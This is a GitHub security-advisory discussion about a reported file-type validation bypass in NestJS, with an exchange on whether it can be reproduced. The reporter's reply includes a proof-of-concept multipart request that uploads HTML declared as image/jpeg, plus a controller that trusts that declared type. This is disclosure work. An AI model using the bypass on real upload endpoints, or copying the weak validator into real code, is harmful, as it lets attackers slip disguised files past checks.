[GHSA-cj7v-w2c7-cp7c] File Upload vulnerability in nestjs nest v.10.3.2 allows...

[aydinnyunus]

Updates

• Affected products
• CVSS v3
• Description
• Severity
• Source code location
• Summary

Comments
Version update
Add CVSS and affected products

[shelbyc]

Hi @aydinnyunus, thanks for reaching out to talk about GHSA-cj7v-w2c7-cp7c! I showed this community contribution, https://gist.github.com/aydinnyunus/801342361584d1491c67a820a714f53f, and nestjs/nest#13311 (comment) to a colleague of mine who tried to replicate the findings from the research report.

My colleague wasn't able to reproduce the vulnerability with the Steps to Reproduce from https://gist.github.com/aydinnyunus/801342361584d1491c67a820a714f53f, but there is some potential for a regular expression denial of service. Did you explore the possibility of ReDos when researching NestJS?

Additionally, nestjs/nest#13311 (comment) doesn't say anything about verifying the research report or remediating any issues in file-type.validator.ts. Are kamilmysliwiec and/or the other maintainers of NestJS aware of CVE-2024-29409 or the report from https://gist.github.com/aydinnyunus/801342361584d1491c67a820a714f53f, and have they said anything about CVE-2024-29409 publicly?

[aydinnyunus]

Hi @shelbyc,

I updated the PoC. Can you check again ?

POST /upload HTTP/1.1
Host: localhost:3000
User-Agent: curl/8.7.1
Accept: */*
Content-Length: 272
Content-Type: multipart/form-data; boundary=------------------------A7V5gtNRD2195N62afxDmH
Connection: keep-alive

--------------------------A7V5gtNRD2195N62afxDmH
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: image/jpeg

<html>
  <body>
   Example PoC for GHSA-cj7v-w2c7-cp7c
  </body>
</html>

--------------------------A7V5gtNRD2195N62afxDmH--

@Controller('upload')
export class UploadController {
  @Post()
  @UseInterceptors(
    FileInterceptor('file', {
      storage: diskStorage({
        destination: './uploads', // Store uploaded files in the "uploads" directory
        filename: (req: Express.Request, file: Express.Multer.File, cb) => {
          cb(null, `${Date.now()}-${file.originalname}`);
        },
      }),
    }),
  )
  uploadFile(
    @UploadedFile(
      new ParseFilePipe({
        validators: [new FileTypeValidator({ fileType: /image\/(jpeg|png|jpg)/ })],
        exceptionFactory: () => new BadRequestException(['messages.invalid.file.type']),
      })
    ) file: Express.Multer.File
  ) {
    if (!file) {
      throw new BadRequestException('No file uploaded or invalid file type!');
    }
    return { message: 'File uploaded successfully', filename: file.filename };
  }

• I did not exploit the reDOS vulnerability because I think that the routing was controlled by code rather than user input. Therefore, I did not report it.
• They didn't explicitly mention anything, but there's a comment in the file-type-validator indicating it's vulnerable. Users should be aware of this risk when using the file type validator function. I assume they are not plan to fix it.

[advisory-database]

Hi @aydinnyunus! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!

[hbnrmx]

Hi @kamilmysliwiec, could you please check the validity of this report? Thank you!